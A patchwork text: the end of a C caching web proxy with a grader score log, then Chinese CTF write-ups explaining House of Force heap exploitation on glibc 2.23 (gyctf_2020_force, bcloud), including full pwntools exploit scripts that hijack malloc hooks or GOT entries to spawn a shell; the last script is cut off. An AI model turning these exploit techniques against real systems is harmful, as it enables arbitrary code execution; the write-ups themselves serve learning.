    victim->time = currentTimeMillis();
    victim->datasize = len;
    snprintf(victim->url, MAXLINE, "%s", url);
    memcpy(victim->data, data, len);
    pthread_rwlock_unlock(&victim->rwlock);
    printf("write Cache\n");
}

/*
 * currentTimeMillis - wall-clock time from gettimeofday, in milliseconds.
 */
int64_t currentTimeMillis() {
    struct timeval now;

    gettimeofday(&now, NULL);
    /* whole seconds scaled to ms, plus the microsecond part truncated to ms */
    return (int64_t)(now.tv_sec) * 1000 + (now.tv_usec / 1000);
}


/*
 * main - proxy entry point: "<prog> <port>".
 *
 * Ignores SIGPIPE, initialises the cache, opens the listening socket and then
 * accepts connections forever, handing each one to a new thread. The accepted
 * descriptor is passed in a heap cell that the thread frees.
 */
int main(int argc, char** argv)
{
    char peer_host[MAXLINE], peer_port[MAXLINE];
    struct sockaddr_storage peer;
    socklen_t peer_len;
    pthread_t worker;
    int listener;

    if (argc != 2) {
        fprintf(stderr, "usage: %s <port>\n", argv[0]);
        exit(1);
    }

    signal(SIGPIPE, SIG_IGN);
    init_cache(); /* set up the cache before any worker can touch it */
    listener = Open_listenfd(argv[1]);

    for (;;) {
        int* fd_cell;

        printf("listening..\n");
        peer_len = sizeof(peer);
        fd_cell = Malloc(sizeof(int));
        *fd_cell = Accept(listener, (SA*)&peer, &peer_len);

        Getnameinfo((SA*)&peer, peer_len, peer_host, MAXLINE,
            peer_port, MAXLINE, 0);
        printf("Accepted connection from (%s, %s)\n", peer_host, peer_port);
        Pthread_create(&worker, NULL, thread, fd_cell);
    }

    /* Not reached: the accept loop above never exits. */
    free_cache();
    return 0;
}

/*
 * thread - per-connection worker.
 *
 * vargp points to a heap-allocated int holding the connected descriptor; the
 * cell is freed here. The thread detaches itself, serves the request with
 * doit, closes the descriptor and returns NULL.
 */
void* thread(void* vargp)
{
    int* fd_cell = vargp;
    const int client = *fd_cell;

    Free(fd_cell);
    Pthread_detach(pthread_self());
    doit(client);
    Close(client);
    return NULL;
}

/*
 * doit - handle one proxied HTTP transaction on client_fd, with caching.
 *
 * Reads the request line, rejects anything but GET, and answers from the
 * cache when the URI is present. Otherwise it connects to the origin server,
 * forwards a rewritten HTTP/1.0 request, relays the response to the client
 * and stores it in the cache if the whole object fits. The caller owns
 * client_fd; the upstream descriptor opened here is closed before returning.
 */
void doit(int client_fd)
{
    int endserver_fd;
    char buf[MAXLINE], method[MAXLINE], uri[MAXLINE], version[MAXLINE];
    rio_t from_client, to_endserver;
    char hostname[MAXLINE], path[MAXLINE];
    int port;

    Rio_readinitb(&from_client, client_fd);

    if (!Rio_readlineb(&from_client, buf, MAXLINE))
        return;
    /* Every token is shorter than buf, so the unbounded %s cannot overflow.
     * Method and URI are both required; version is parsed but unused. */
    if (sscanf(buf, "%s %s %s", method, uri, version) < 2) {
        clienterror(client_fd, buf, "400", "Bad Request",
            "Proxy Server could not parse the request line");
        return;
    }
    if (strcasecmp(method, "GET")) {
        clienterror(client_fd, method, "501", "Not Implemented",
            "Proxy Server does not implement this method");
        return;
    }
    /* Cache hit: read_cache has already written the object to the client. */
    int ret = read_cache(uri, client_fd);
    if (ret == 1) {
        return;
    }

    parse_uri(uri, hostname, path, &port);
    /* Large enough for any int, including sign and terminator. */
    char port_str[16];
    snprintf(port_str, sizeof port_str, "%d", port);
    endserver_fd = Open_clientfd(hostname, port_str);
    if (endserver_fd < 0) {
        printf("connection failed\n");
        return;
    }
    Rio_readinitb(&to_endserver, endserver_fd);

    char newreq[MAXLINE];
    snprintf(newreq, sizeof newreq, "GET %s HTTP/1.0\r\n", path);
    /* build_requesthdrs takes the port as its fourth argument (Host header). */
    build_requesthdrs(&from_client, newreq, hostname, port_str);

    Rio_writen(endserver_fd, newreq, strlen(newreq));
    int n, size = 0;    /* size: bytes buffered for the cache so far */
    int cacheable = 1;  /* cleared once the object no longer fits in data */
    char data[MAX_OBJECT_SIZE];
    while ((n = Rio_readlineb(&to_endserver, buf, MAXLINE))) {
        /* Buffer only while the whole chunk still fits. The old test
         * (size <= MAX_OBJECT_SIZE) let memcpy run past the end of data. */
        if (cacheable && size + n <= MAX_OBJECT_SIZE) {
            memcpy(data + size, buf, n);
            size += n;
        }
        else {
            cacheable = 0;
        }
        printf("proxy received %d bytes,then send\n", n);
        Rio_writen(client_fd, buf, n);
    }
    printf("size: %d\n", size);
    /* Cache only complete, non-empty objects below the size limit; a
     * truncated or empty entry would be replayed on every later hit. */
    if (cacheable && size > 0 && size < MAX_OBJECT_SIZE) {
        write_cache(uri, data, size);
    }
    /* Release the upstream socket; otherwise every request leaks one fd. */
    Close(endserver_fd);
}

/*
 * clienterror - send an HTTP/1.0 error response with a small HTML body.
 *
 * fd        descriptor to write the response to
 * cause     offending token, echoed in the body
 * errnum    status code as text (e.g. "501")
 * shortmsg  reason phrase
 * longmsg   longer explanation shown in the body
 *
 * The body is formatted with one bounded snprintf: the previous
 * sprintf(body, "%s...", body) pattern passed the destination as a source
 * argument (undefined behaviour) and could overrun body. The emitted bytes
 * are unchanged for inputs that fit.
 */
void clienterror(int fd, char* cause, char* errnum,
    char* shortmsg, char* longmsg)
{
    char buf[MAXLINE], body[MAXBUF];

    snprintf(body, sizeof body,
        "<html><title>Proxy Error</title>"
        "<body bgcolor=ffffff>\r\n"
        "%s: %s\r\n"
        "<p>%s: %s\r\n"
        "<hr><em>The Proxy Web server</em>\r\n",
        errnum, shortmsg, longmsg, cause);

    snprintf(buf, sizeof buf, "HTTP/1.0 %s %s\r\n", errnum, shortmsg);
    Rio_writen(fd, buf, strlen(buf));
    snprintf(buf, sizeof buf, "Content-type: text/html\r\n");
    Rio_writen(fd, buf, strlen(buf));
    snprintf(buf, sizeof buf, "Content-length: %d\r\n\r\n", (int)strlen(body));
    Rio_writen(fd, buf, strlen(buf));
    Rio_writen(fd, body, strlen(body));
}

/*
 * parse_uri - split "[scheme://]host[:port][/path]" into its parts.
 *
 * uri       NUL-terminated request URI; it is only read, never modified
 * hostname  out: host part; needs room for strlen(uri) + 2 bytes
 * path      out: path starting at the first '/', or "/" when the URI has none;
 *           needs room for strlen(uri) + 2 bytes
 * port      out: port after "host:", or 80 when absent or not numeric
 *
 * A ':' counts as a port separator only when it appears before the first '/'
 * of the authority, so a colon inside the path no longer corrupts the host.
 * path is always written, including for "host:port" with no path.
 */
void parse_uri(char* uri, char* hostname, char* path, int* port) {
    const char* host;
    const char* rest;
    const char* colon;
    size_t auth_len, host_len;

    *port = 80;

    /* Skip everything up to and including "//" when a scheme is present. */
    host = strstr(uri, "//");
    host = (host != NULL) ? host + 2 : uri;

    /* The authority ("host[:port]") ends at the first '/' or at the end. */
    auth_len = strcspn(host, "/");
    rest = host + auth_len;

    colon = memchr(host, ':', auth_len);
    host_len = (colon != NULL) ? (size_t)(colon - host) : auth_len;

    memcpy(hostname, host, host_len);
    hostname[host_len] = '\0';

    /* On a non-numeric port sscanf assigns nothing and the default stays. */
    if (colon != NULL)
        sscanf(colon + 1, "%d", port);

    strcpy(path, (*rest != '\0') ? rest : "/");
}

/*
 * build_requesthdrs - append the forwarded request headers to newreq.
 *
 * rp        buffered reader positioned just after the client's request line
 * newreq    in/out: already holds the request line; assumed to have room for
 *           MAXLINE bytes (doit passes a char[MAXLINE])
 * hostname  origin host for the Host header
 * port      origin port (text) for the Host header
 *
 * Client headers are forwarded except Host, User-Agent, Connection and
 * Proxy-Connection, which are replaced by the proxy's own values. Appends are
 * done at a tracked offset with explicit bounds: the old
 * sprintf(newreq, "%s...", newreq) calls overlapped source and destination
 * and could overflow newreq. A client header that would leave no room for the
 * mandatory trailer is dropped.
 */
void build_requesthdrs(rio_t* rp, char* newreq, char* hostname, char* port) {
    char buf[MAXLINE];
    char tail[MAXLINE];
    size_t used = strlen(newreq);
    size_t tail_len;
    int rc;

    /* Build the mandatory trailer first so its space can be reserved. */
    rc = snprintf(tail, sizeof tail, "Host: %s:%s\r\n%s%s%s\r\n",
        hostname, port, user_agent_hdr, conn_hdr, prox_hdr);
    if (rc < 0)
        tail_len = 0;
    else if ((size_t)rc >= sizeof tail)
        tail_len = sizeof tail - 1;
    else
        tail_len = (size_t)rc;

    while (Rio_readlineb(rp, buf, MAXLINE) > 0) {
        if (!strcmp(buf, "\r\n")) break;
        if (strstr(buf, "Host:") != NULL) continue;
        if (strstr(buf, "User-Agent:") != NULL) continue;
        if (strstr(buf, "Connection:") != NULL) continue;
        if (strstr(buf, "Proxy-Connection:") != NULL) continue;

        size_t n = strlen(buf);
        if (used + n + tail_len < MAXLINE) {
            memcpy(newreq + used, buf, n);
            used += n;
            newreq[used] = '\0';
        }
    }

    if (used < MAXLINE)
        snprintf(newreq + used, MAXLINE - used, "%s", tail);
}

打分：

*** Cache ***
Starting tiny on port 10306
Starting proxy on port 2574
Fetching ./tiny/tiny.c into ./.proxy using the proxy
Fetching ./tiny/home.html into ./.proxy using the proxy
Fetching ./tiny/csapp.c into ./.proxy using the proxy
Killing tiny
Fetching a cached copy of ./tiny/home.html into ./.noproxy
Success: Was able to fetch tiny/home.html from the cache.
Killing proxy
cacheScore: 15/15

totalScore: 70/70

House Of Force-2.23-64

Posted on 2022-03-05 In Pwn train 5.4k 5 mins.

gyctf_2020_force

1
2
3

➜  [/home/ywhkkx/桌面] ./gyctf_2020_force 
1:add
2:puts

gyctf_2020_force: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=6d464fea7805860b83ff9bc8f4467dd258ebd04f, stripped
 
[*] '/home/ywhkkx/桌面/gyctf_2020_force'
    Arch:     amd64-64-little
    RELRO:    Full RELRO // 打不了GOT劫持
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

64位，dynamically，全开

// Decompiled entry point of gyctf_2020_force: unbuffers stdio, then loops
// forever printing the two-item menu and dispatching on the number read.
void __fastcall __noreturn main(int a1, char **a2, char **a3)
{
  __int64 choice; // rax
  char s[256]; // [rsp+10h] [rbp-110h] BYREF
  unsigned __int64 v5; // [rsp+118h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  memset(s, 255, sizeof(s));
  while ( 1 )
  {
    memset(s, 255, sizeof(s));
    puts("1:add");
    puts("2:puts");
    // Reads up to 0xF bytes of menu input into `data` (not a local here).
    read(0, data, 0xFuLL);
    choice = atol(data);
    if ( choice == 1 )
    {
      add();
    }
    else if ( choice == 2 )
    {
      puts_s();
    }
  }
}

标准堆模板

// Decompiled "add" handler: finds the first empty slot in chunk_list,
// mallocs a caller-chosen size, prints the returned pointer and reads the
// chunk content.
unsigned __int64 add()
{
  const void **i; // [rsp+0h] [rbp-120h]
  __int64 size; // [rsp+8h] [rbp-118h]
  char s[256]; // [rsp+10h] [rbp-110h] BYREF
  unsigned __int64 v4; // [rsp+118h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  memset(s, 255, sizeof(s));
  // Walk to the first NULL entry.
  for ( i = (const void **)&chunk_list; *i; ++i )
    ;
  // Exit once the free slot lies more than 39 bytes into chunk_list.
  if ( (char *)i - (char *)&chunk_list > 39 )
    exit(0);
  puts("size");
  read(0, data, 0xFuLL);
  // The size comes straight from atol with no range check.
  size = atol(data);
  *i = malloc(size);
  if ( !*i )
    exit(0);
  // Prints the address malloc returned.
  printf("bin addr %p\n", *i);
  puts("content");
  read(0, (void *)*i, 0x50uLL);                 // heap overflow: always reads 0x50 bytes, whatever size was requested
  puts("done");
  return __readfsqword(0x28u) ^ v4;
}

有一个溢出，输入“size”，读入“0x50”字节

// Decompiled "puts" handler: prints the string at `leak` (defined outside
// this function) and returns the stack-canary check value.
unsigned __int64 puts_s()
{
  unsigned __int64 carnay; // [rsp+8h] [rbp-8h]

  carnay = __readfsqword(0x28u);
  puts(&leak);
  return __readfsqword(0x28u) ^ carnay;
}

只能利用这个函数打 leak

入侵思路

先利用 mmap 获取 libc_base：

chunk1=add(0x200000,'here')
libc_base=chunk1+0x200ff0
success('chunk1 >> '+hex(chunk1))
success('libc_base >> '+hex(libc_base))

修改“topchunk->size”为“0xffffffffffffffff”：

1
2
3

chunk2=add(0x20,'a'*40+p64(0xffffffffffffffff))
topchunk_addr=0x55e87208e290+48
success('topchunk_addr >> '+hex(topchunk_addr))

1
2
3

Allocated chunk | PREV_INUSE | IS_MMAPED | NON_MAIN_ARENA
Addr: 0x55e87208e2c0
Size: 0xffffffffffffffff

计算 offset 分割 top chunk：

offset=malloc_hook-(topchunk_addr+0x10)-0x20
add(offset, 'kkk\n')
magic_addr=add(0x40, 'yhellow\n')
success('magic_addr >> '+hex(magic_addr))

[+] magic_addr >> 0x7f33a5420b00

pwndbg> telescope 0x7f33a5420b00
00:0000│  0x7f33a5420b00 (__memalign_hook) ◂— 0xa776f6c6c656879 ('yhellow\n')
01:0008│  0x7f33a5420b08 (__realloc_hook) —▸ 0x7f33a50e1a70 (realloc_hook_ini) ◂— push   r15
02:0010│  0x7f33a5420b10 (__malloc_hook) ◂— 0x0
03:0018│  0x7f33a5420b18 ◂— 0x0
04:0020│  0x7f33a5420b20 (main_arena) ◂— 0x100000000

注意：采用“offset=malloc_hook-(topchunk_addr+0x10)”（以前总结的规律），就会申请到“main_arena”，和预期“__malloc_hook”差了 0x10 字节，推测可能是那 1字节的误差搞得鬼（也是以前总结的规律），这 1字节导致 0x10字节对齐的程序“进位”了（当然有时不会有反应）

我们需要劫持“realloc_hook”为“one_gadget”，劫持“malloc_hook”为“realloc+0x10”（即 realloc 函数地址加 0x10，而不是 realloc_hook 的地址），所以只要在原来 offset 的基础上减 0x20 就好了：

offset=malloc_hook-(topchunk_addr+0x10)-0x20
add(offset, 'kkk\n')
magic_addr=add(0x40, 'a'*8+p64(one_gadget_libc)+p64(realloc+0x10))
success('magic_addr >> '+hex(magic_addr))

pwndbg> telescope 0x7f4aa6c3ab00
00:0000│  0x7f4aa6c3ab00 (__memalign_hook) ◂— 0x6161616161616161 ('aaaaaaaa')
01:0008│  0x7f4aa6c3ab08 (__realloc_hook) —▸ 0x7f4aa68bb27a (do_system+1098) ◂— mov    rax, qword ptr [rip + 0x37ec37]
02:0010│  0x7f4aa6c3ab10 (__malloc_hook) —▸ 0x7f4aa68fa720 (realloc+16) ◂— sub    rsp, 0x38
03:0018│  0x7f4aa6c3ab18 ◂— 0x0
04:0020│  0x7f4aa6c3ab20 (main_arena) ◂— 0x100000000

完整exp：

# House of Force exploit for gyctf_2020_force (glibc 2.23, 64-bit).
# Steps: leak libc from a huge allocation, overwrite the top chunk size,
# move the top chunk next to the malloc hooks, overwrite the hooks, then
# trigger one more malloc.
from pwn import*

p=process('./gyctf_2020_force')
elf=ELF('./gyctf_2020_force')
libc = ELF('./libc-2.23.so')

# Menu option 1: request `size` bytes, parse the pointer printed after
# "bin addr ", send `content`, and return the parsed address.
def add(size,content):
	p.sendline(str(1))
	p.sendlineafter('size\n',str(size))
	p.recvuntil('bin addr ')
	# NOTE(review): eval() runs on bytes received from the target process;
	# int(..., 16) would parse the %p output without evaluating it.
	heap_addr=eval(p.recvuntil('\n')[:-1])
	success('heap_add >> '+hex(heap_addr))
	p.sendafter('content\n',content)
	return heap_addr
	
# Menu option 2 (not used below).
def put():
	p.sendline(str(2))

# Candidate one_gadget offsets; presumably for the bundled libc-2.23.so -- confirm.
onegadget = [0x45226, 0x4527a, 0xf03a4, 0xf1247]

# leak_offset is not used below.
leak_offset=0xD93
# A 0x200000-byte request; per the write-up it is served by mmap, and the
# returned address plus 0x200ff0 is taken as the libc base (offset from the
# author's environment -- TODO confirm for other setups).
chunk1=add(0x200000,'here')
libc_base=chunk1+0x200ff0
success('chunk1 >> '+hex(chunk1))
success('libc_base >> '+hex(libc_base))

# add() always reads 0x50 bytes, so 40 filler bytes followed by
# 0xffffffffffffffff overwrite the top chunk's size field.
chunk2=add(0x20,'a'*40+p64(0xffffffffffffffff))
topchunk_addr=chunk2+32
success('topchunk_addr >> '+hex(topchunk_addr))

malloc_hook=libc.sym['__malloc_hook']+libc_base
realloc=libc.sym["__libc_realloc"]+libc_base
one_gadget_libc=onegadget[1]+libc_base
success('malloc_hook >> '+hex(malloc_hook))
success('one_gadget_libc >> '+hex(one_gadget_libc))

# Request size that moves the top chunk so the next allocation lands 0x10
# below __malloc_hook (the write-up's dump shows it at __memalign_hook).
offset=malloc_hook-(topchunk_addr+0x10)-0x20
add(offset, 'kkk\n')
# 8 filler bytes, then __realloc_hook = one_gadget, then
# __malloc_hook = realloc+0x10.
magic_addr=add(0x40, 'a'*8+p64(one_gadget_libc)+p64(realloc+0x10))
success('magic_addr >> '+hex(magic_addr))

# One more "add" request so malloc is called with the hooks overwritten.
p.recvuntil("2:puts\n")
p.sendline('1')
p.recvuntil("size\n")
p.sendline(str(20))

p.interactive()

house of force 小结（2.23-64位）

通过本题目，我对 offset 的计算有了更深刻的理解，即使有时候 offset 有偏差也可以进行修正了

另外，我对 malloc_hook 的打法也有了新的认识：先劫持“realloc_hook”为“one_gadget”，后劫持“malloc_hook”为“realloc+0x10”（即 realloc 函数地址加 0x10；不能直接劫持“malloc_hook”，目前不知道原因）

最后尝试了用 libc-2.27 来打 house of force，打不通，分析源码发现通不过检查（几乎打死了 house of force），得出结论：house of force 只能在 libc-2.23 中打（如果以后发现有大神可以绕过检查的话，就回来补充）

House Of Force-2.23-32

Posted on 2022-03-04 Edited on 2022-03-05 In Pwn train 11k 10 mins.

bcloud

➜  [/home/ywhkkx/桌面] ./bcloud 
Input your name:
ywhkkx
Hey ywhkkx! Welcome to BCTF CLOUD NOTE MANAGE SYSTEM!
Now let's set synchronization options.
Org:
hehe
Host:
heh
OKay! Enjoy:)
1.New note
2.Show note
3.Edit note
4.Delete note
5.Syn
6.Quit
option--->>

bcloud: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /home/ywhkkx/tool/glibc-all-in-one/libs/2.23-0ubuntu11.3_i386/ld-2.23.so, for GNU/Linux 2.6.24, BuildID[sha1]=96a3843007b1e982e7fa82fbd2e1f2cc598ee04e, stripped

[*] '/home/ywhkkx/桌面/bcloud'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8047000)

32位，dynamically，开了canary，开了NX

漏洞分析

// Decompiled helper: reads bytes one at a time from stdin into str until
// `size` bytes were stored or the terminator byte `a` is seen, then appends
// a NUL. Exits with -1 if read() returns <= 0.
void __cdecl readStr(char *str, int size, char a)
{
  char buf; // [esp+1Bh] [ebp-Dh] BYREF
  int i; // [esp+1Ch] [ebp-Ch]

  for ( i = 0; i < size; ++i )
  {
    if ( read(0, &buf, 1u) <= 0 )
      exit(-1);
    if ( buf == a )
      break;
    str[i] = buf;
  }
  str[i] = 0;                                   // off-by-one: when all `size` bytes were stored, this NUL goes to str[size]
}

经典的一字节溢出

// Decompiled "Delete note" handler: validates the id (0..9), clears the
// note's table entries and frees the chunk.
void delNote()
{
  int index; // [esp+18h] [ebp-10h]
  char *ptr; // [esp+1Ch] [ebp-Ch]

  puts("Input the id:");
  index = readInt();
  if ( index >= 0 && index <= 9 )
  {
    ptr = noteList[index];
    if ( ptr )
    {
      // Both table entries are zeroed before the free.
      noteList[index] = 0;
      noteLens[index] = 0;
      free(ptr);                                // local ptr is not cleared, but noteList[index] was already zeroed above
      puts("Delete success.");
    }
    else
    {
      puts("Note has been deleted.");
    }
  }
  else
  {
    puts("Invalid ID.");
  }
}

free 没有置空指针，但是对“noteList”和“noteLens”进行了清零操作，使后续的修改模块无法获取这个chunk

入侵思路

首先要实现 leak，由于本程序的打印模块是假的：

// Decompiled stub: only prints a fixed message. The write-up identifies this
// as the program's non-functional "show" handler.
void no_work()
{
  puts("WTF? Something strange happened.");
}

所以只有这一个位置可以打印：

// Decompiled name prompt: reads up to 0x40 bytes into the stack buffer
// `name`, copies it into a fresh 0x40-byte heap chunk and greets the user.
void input_name()
{
  char name[64]; // [esp+1Ch] [ebp-5Ch] BYREF name sits directly below name_heap, so readStr's extra NUL lands in name_heap
  char *name_heap; // [esp+5Ch] [ebp-1Ch]
  unsigned int v2; // [esp+6Ch] [ebp-Ch]

  v2 = __readgsdword(0x14u);
  memset(name, 0, 0x50u);
  puts("Input your name:");
  // With a full 0x40-byte input, readStr writes its NUL at name[0x40],
  // which is the first byte of name_heap.
  readStr(name, 0x40, 10);
  // This assignment overwrites that NUL, leaving name unterminated.
  name_heap = (char *)malloc(0x40u);
  name_list = (int)name_heap;
  strcpy(name_heap, name);                      // with a full-length name this also copies the name_heap pointer bytes that follow it
  hello((int)name_heap);
}

// Decompiled greeting: prints the string whose address is passed in a1
// with %s, followed by a fixed banner line.
void __cdecl hello(int a1)
{
  printf("Hey %s! Welcome to BCTF CLOUD NOTE MANAGE SYSTEM!\n", (const char *)a1);
  puts("Now let's set synchronization options.");
}

输入 0x40（64）个“a”的确可以溢出东西，但仍需要确定是什么：

p.readuntil("name:\n")
p.send("a"*0x40)

p.read(0x44)
heap = u32(p.read(4))
success("heap >> "+hex(heap))

pwndbg> stack 50
00:0000│ esp 0xffe16710 —▸ 0x8048e2c ◂— dec    eax /* 'Hey %s! Welcome to BCTF CLOUD NOTE MANAGE SYSTEM!\n' */
01:0004│     0xffe16714 —▸ 0x9cc1008 ◂— 0x61616161 ('aaaa')
02:0008│     0xffe16718 —▸ 0xffe1674c ◂— 0x61616161 ('aaaa')

pwndbg> x/20xw 0x9cc1008
0x9cc1008:	0x61616161	0x61616161	0x61616161	0x61616161
0x9cc1018:	0x61616161	0x61616161	0x61616161	0x61616161
0x9cc1028:	0x61616161	0x61616161	0x61616161	0x61616161
0x9cc1038:	0x61616161	0x61616161	0x61616161	0x61616161
0x9cc1048:	0x09cc1008	0x00020f00	0x00000000	0x00000000

地址“0x09cc1008”将会被泄露出来，它即是 heap 的首地址

为什么会这样呢？我刚开始以为是 off-by-null 的效果，后来仔细分析代码发现根本不是这个原因

1 2	char name[64]; // [esp+1Ch] [ebp-5Ch] BYREF char *name_heap; // [esp+5Ch] [ebp-1Ch]

1	name_heap = (char *)malloc(0x40u);

malloc 执行以后，返回的地址写入 name_heap，反向覆盖了 name 末尾的“\x00”，导致 name_heap 也可以被打印出来了（和 books 很像）

// Decompiled Org/Host prompt: reads both strings into stack buffers and
// copies each into its own 0x40-byte heap chunk.
// Stack layout per the offsets below: org (0x40 bytes), then org_heap,
// then host, then host_heap.
void input_oh()
{
  char org[64]; // [esp+1Ch] [ebp-9Ch] BYREF a full-length input puts readStr's NUL into the first byte of org_heap
  char *org_heap; // [esp+5Ch] [ebp-5Ch]
  char host[68]; // [esp+60h] [ebp-58h] BYREF
  char *host_heap; // [esp+A4h] [ebp-14h]
  unsigned int v4; // [esp+ACh] [ebp-Ch]

  v4 = __readgsdword(0x14u);
  memset(org, 0, 0x90u);
  puts("Org:");
  readStr(org, 0x40, 10);                       // can write one byte (the NUL) past org
  puts("Host:");
  readStr(host, 0x40, 10);
  host_heap = (char *)malloc(0x40u);
  org_heap = (char *)malloc(0x40u); // overwrites the NUL that terminated org
  org_list = (int)org_heap; 
  host_list = (int)host_heap;
  strcpy(host_heap, host);
  strcpy(org_heap, org); // copies org, then the org_heap pointer bytes, then the contents of host, until the first NUL
  puts("OKay! Enjoy:)");
}

这个函数一看就有问题（交叉写入的方式，还有 off-by-one，很容易出漏洞）

和上一个函数一样的问题，导致 org + org_heap + host（栈上紧跟在 org_heap 之后的 host 数组内容）一起被复制到了 org_heap，我们可能可以控制 top chunk 的 size 了（org_heap 指针覆盖 top chunk->presize，host 的内容覆盖 top chunk->size）

p.readuntil("Org:")
p.send("a"*0x40)
p.readuntil("Host:")
p.sendline(p32(0xffffffff))
p.readuntil("Enjoy:")

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x824c000
Size: 0x49

Allocated chunk | PREV_INUSE
Addr: 0x824c048
Size: 0x49

Allocated chunk | PREV_INUSE
Addr: 0x824c090
Size: 0x49

Allocated chunk | PREV_INUSE | IS_MMAPED | NON_MAIN_ARENA
Addr: 0x824c0d8
Size: 0xffffffff
// top chunk addr - heap addr = 0xd8

现在 House Of Force 的条件已经准备好了，现在要考虑怎么打 House Of Force

先看修改模块：

// Decompiled "Edit note" handler: validates the id (0..9) and re-reads the
// note content into the pointer stored in noteList, bounded by the length
// stored in noteLens.
void editNote()
{
  int index; // [esp+14h] [ebp-14h]
  char *note; // [esp+18h] [ebp-10h]
  int len; // [esp+1Ch] [ebp-Ch] NOTE(review): the original annotation says len can be overflowed; not evident from this function alone

  puts("Input the id:");
  index = readInt();
  if ( index >= 0 && index <= 9 )
  {
    note = noteList[index];
    if ( note )
    {
      len = noteLens[index];
      syned[index] = 0;
      puts("Input the new content:");
      readStr(note, len, 10);                   // off-by-one: readStr may write a NUL at note[len]
      puts("Edit success.");
    }
    else
    {
      puts("Note has been deleted.");
    }
  }
  else
  {
    puts("Invalid ID.");
  }
}

“noteList”（0x804B120）中的地址可以被修改模块控制，所以可以控制它来打hook劫持

现在来考虑的是：怎么分割 top chunk 来使 newchunk 分配到“noteList”上

// Decompiled "New note" handler: takes the first empty slot of noteList
// (10 slots), allocates len + 4 bytes, records len in noteLens and reads the
// content.
void newNote()
{
  int i; // [esp+18h] [ebp-10h]
  int len; // [esp+1Ch] [ebp-Ch]

  // Find the first empty slot.
  for ( i = 0; i <= 9 && noteList[i]; ++i )
    ;
  if ( i == 10 )
  {
    puts("Lack of space. Upgrade your account with just $100 :)");
  }
  else
  {
    puts("Input the length of the note content:");
    // len is used as read; no range check appears in this function.
    len = readInt();
    noteList[i] = (char *)malloc(len + 4);
    if ( !noteList[i] )
      exit(-1);
    noteLens[i] = len;
    puts("Input the content:");
    readStr(noteList[i], len, 10);
    printf("Create success, the id is %d\n", i);
    syned[i] = 0;
  }
}

申请模块就没有什么价值了

打 House Of Force ，把 top chunk的数据区分割到 note_list：

note_list = 0x804B120
top_chunk_addr = heap + 0xD8 # top chunk 的首地址

offset = note_list - (top_chunk_addr + 0x8) - 24
# note_list - top_chunk_addr - 0x10 就可以保证 top chunk 被分割到 note_list
# 再减去"24"是为了保证new_note(0x10, "kkk")后，top chunk 被分割到 note_list
new_note(0x10, "kkk")
new_note(offset,'')

payload = p32(elf.got["free"])
payload += p32(elf.got["atoi"])
payload += p32(elf.got["atoi"])
new_note(0x100, payload)

申请 0x10 是为了在noteLens[0]中写入 0x10 (假设没有此操作，后续需要的字节数不能满足)

现在看看这个偏移是怎么算的：offset = note_list - top_chunk_addr - 0x8 - 24

new_note(0x10, “kkk”) 申请前：

1
2
3

Allocated chunk | PREV_INUSE | IS_MMAPED | NON_MAIN_ARENA
Addr: 0x9db20d8
Size: 0xffffffff

new_note(0x10, “kkk”) 申请后：

Allocated chunk | PREV_INUSE
Addr: 0x9db20d8
Size: 0x19 // 0x18(24)

Top chunk | PREV_INUSE
Addr: 0x9db20f0
Size: 0xffffffe1

1 2	In [2]: 0x9db20f0-0x9db20d8 Out[2]: 24

每次申请 “size” 字节的 chunk ，top chunk 的地址都增加 “size” 字节，如果申请一个比较大的 “size” ，导致最高位溢出，就可能会申请到 note_list：

1 2	0x9db20f0 + 0x8 (top chunk data) + offset = 0x100804B120(note_list) offset = note_list - top chunk data

直接减也可以获取相似的效果（即使它是负数，也会被当成 unsigned long）

通过数学计算得：用这种操作会有1字节的误差，但是被内存对齐抵消了

GDB查看内存：

pwndbg> telescope 0x804B120
00:0000│  0x804b120 —▸ 0x804b014 (free@got.plt) —▸ 0x80484e6 (free@plt+6) ◂— push   0x10 // note_list[0]
01:0004│  0x804b124 —▸ 0x804b03c (atoi@got.plt) —▸ 0xf7d73260 (atoi) ◂— sub    esp, 0x10 // note_list[1]
02:0008│  0x804b128 —▸ 0x804b03c (atoi@got.plt) —▸ 0xf7d73260 (atoi) ◂— sub    esp, 0x10 // note_list[2]
03:000c│  0x804b12c ◂— 0x0

修改 note_list[0] 打 GOT 劫持：

edit_note(0, p32(elf.symbols["printf"]+6))
delete_note(1)
atoi_libc = u32(p.read(4))
p.readuntil("success.")
libc_base = atoi_libc - libc.symbols["atoi"]
print("libc_base >> " + hex(libc_base))

system = libc.symbols["system"] + libc_base
edit_note(2, p32(system))

p.sendline("/bin/sh")
p.interactive()

完整代码：

# House of Force exploit for bcloud (glibc 2.23, 32-bit).
# Steps: leak a heap pointer through the name prompt, overwrite the top chunk
# size through the Org/Host prompt, move the top chunk onto noteList, then
# use the edit handler to overwrite GOT entries.
from pwn import *

#context.log_level = "debug"

# Menu option 1: create a note of the given length with the given content.
def new_note(len,content):
    p.readuntil("--->>")
    p.sendline("1")
    p.readuntil("content:")
    p.sendline(str(len))
    p.readuntil("content:")
    p.sendline(content)

# Menu option 3: overwrite note i with data and wait for the confirmation.
def edit_note(i, data):
    p.readuntil("--->>")
    p.sendline("3")
    p.readuntil("id:\n")
    p.sendline(str(i))
    p.readuntil("content:\n")
    p.sendline(data)
    p.readuntil("success.")

# Menu option 4: delete note i.
def delete_note(i):
    p.readuntil("--->>")
    p.sendline("4")
    p.readuntil("id:\n")
    p.sendline(str(i))

p = process("./bcloud")
elf = ELF("./bcloud")
libc = ELF("./libc-2.23.so")

# A full 0x40-byte name leaves the buffer unterminated, so the greeting also
# prints the heap pointer stored right after it: skip 0x44 bytes
# ("Hey " + 0x40 name bytes), then read the 4 pointer bytes.
p.readuntil("name:\n")
p.send("a"*0x40)
p.read(0x44)
heap = u32(p.read(4))
success("heap >> "+hex(heap))

#gdb.attach(p)

# A full 0x40-byte Org makes strcpy run on into the Host buffer, so the
# 0xffffffff sent as Host ends up in the top chunk's size field (per the
# write-up's heap dump).
